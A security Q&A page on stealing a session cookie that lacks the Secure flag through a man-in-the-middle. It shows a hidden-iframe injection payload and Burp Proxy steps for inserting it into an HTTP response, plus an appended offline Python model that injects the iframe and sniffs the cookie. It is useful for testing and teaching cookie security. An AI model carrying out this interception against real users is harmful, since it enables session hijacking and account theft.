3

So, I am trying to obtain a cookie without the secure flag enabled over HTTPS. After reading about it, I came across an answer:

  1. You visit https://secure.example.com/ which drops a cookie on your browser.

  2. You then visit http://www.msn.com/ however a MITM inserts:

    <div style='visibility:hidden'>
       <iframe src='http://secure.example.com/'></iframe>
    </div>
    
  3. MITM sniffs your cookie from the request on the iframe

I am currently trying to duplicate the above steps.

Using a proxy tool like Burp, I am able to obtain the cookies and all header information. I am wondering, how do I insert an iframe with an HTTP website as a request?

Am I using the wrong tool?

TildalWave
adbarads
    AFAIK, Burp Suite already has an HTTP editor which allows you to do that, or you can [use Fiddler to modify and inject HTML](http://stackoverflow.com/questions/1933934/injecting-javascript-to-website-using-fiddler). – Adi Jun 04 '13 at 16:01
  • This tool might be more useful for you https://github.com/cortesi/mitmproxy – Vitaly Osipov Jun 05 '13 at 07:17

1 Answer

3

You can do this using the Proxy tool (tab) of Burp. Just be sure that you have added the host (msn.com in this case) to the Scope and checked the "Intercept server responses..." check box on the Options tab (under Proxy).

This way all the server responses will be displayed on the Intercept tab where you can place arbitrary content in them.

You can also use the automatic Match and Replace feature under Proxy/Options.

http://portswigger.net/burp/help/proxy.html

buherator
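The three steps in the question, modelled end to end as an added example (this is not code from the question, the answer, or Burp). It replaces the proxy with a pure-Python stand-in: a minimal cookie jar that applies the browser rule the attack depends on (a cookie carrying the Secure attribute is only attached to https:// requests), an injection function that does what a Burp Match and Replace rule on `</body>` would do to the unencrypted msn.com response, and a sniffer that pulls the Cookie header out of the clear-text request the browser then makes for the iframe. Host names are the ones used in the question; the msn.com page body and the Set-Cookie values are constructed inputs.

```python
"""Model of the attack described above: a cookie set over HTTPS without the
Secure flag is replayed in clear text once the browser is coaxed into loading
http://secure.example.com/ through an iframe injected into an HTTP page.

Added example with constructed inputs; no network traffic is generated."""
import re
from dataclasses import dataclass
from urllib.parse import urlsplit


@dataclass
class Cookie:
    name: str
    value: str
    domain: str
    secure: bool = False


def parse_set_cookie(domain: str, header: str) -> Cookie:
    """Minimal Set-Cookie parser: name=value followed by optional attributes."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    secure = any(p.lower() == "secure" for p in parts[1:])
    return Cookie(name, value, domain, secure)


def cookie_header_for(jar, url: str) -> str:
    """Browser-side rule that matters here: a Secure cookie is only attached to
    https:// requests; a non-Secure one is sent over plain http:// as well."""
    u = urlsplit(url)
    sent = [c for c in jar
            if c.domain == u.hostname and (u.scheme == "https" or not c.secure)]
    return "; ".join(f"{c.name}={c.value}" for c in sent)


# The hidden iframe from the question, parameterised on the target host.
IFRAME = "<div style='visibility:hidden'><iframe src='http://{host}/'></iframe></div>"


def inject_iframe(html: str, host: str) -> str:
    """What a Burp Match and Replace rule (or a manual edit in Intercept) does to
    the unencrypted response: insert the hidden iframe just before </body>."""
    snippet = IFRAME.format(host=host)
    if re.search(r"</body>", html, re.I):
        return re.sub(r"</body>", snippet + "</body>", html, count=1, flags=re.I)
    return html + snippet


def build_request(url: str, jar) -> str:
    """Clear-text HTTP/1.1 request the browser emits when it loads the iframe."""
    u = urlsplit(url)
    lines = [f"GET {u.path or '/'} HTTP/1.1", f"Host: {u.hostname}"]
    cookie_header = cookie_header_for(jar, url)
    if cookie_header:
        lines.append(f"Cookie: {cookie_header}")
    return "\r\n".join(lines) + "\r\n\r\n"


def sniff_cookie(raw_request) -> dict:
    """Attacker side: pull the Cookie header out of a captured clear-text request."""
    text = raw_request.decode() if isinstance(raw_request, bytes) else raw_request
    headers = text.split("\r\n\r\n", 1)[0].split("\r\n")[1:]
    for line in headers:
        key, _, val = line.partition(":")
        if key.strip().lower() == "cookie":
            return dict(p.strip().split("=", 1) for p in val.split(";") if "=" in p)
    return {}


def run_attack(set_cookie_header: str) -> dict:
    """Steps 1 to 3 in sequence; returns whatever the MITM was able to sniff."""
    # Step 1: https://secure.example.com/ drops a cookie on the browser.
    jar = [parse_set_cookie("secure.example.com", set_cookie_header)]
    # Step 2: constructed stand-in for the http://www.msn.com/ page the MITM tampers with.
    page = "<html><body><h1>news</h1></body></html>"
    tampered = inject_iframe(page, "secure.example.com")
    iframe_src = re.search(r"src='([^']+)'", tampered).group(1)
    # Step 3: the browser fetches the iframe over plain HTTP; the MITM reads the request.
    return sniff_cookie(build_request(iframe_src, jar))


if __name__ == "__main__":
    print(run_attack("session=abc123; Path=/"))           # leaks: {'session': 'abc123'}
    print(run_attack("session=abc123; Path=/; Secure"))   # nothing leaks: {}
```

The second call is the check worth keeping in mind while testing with Burp: if the target sets the cookie with the Secure attribute, the browser never puts it on the http:// iframe request, so an empty Cookie header there is the expected result and not a sign that the injection failed.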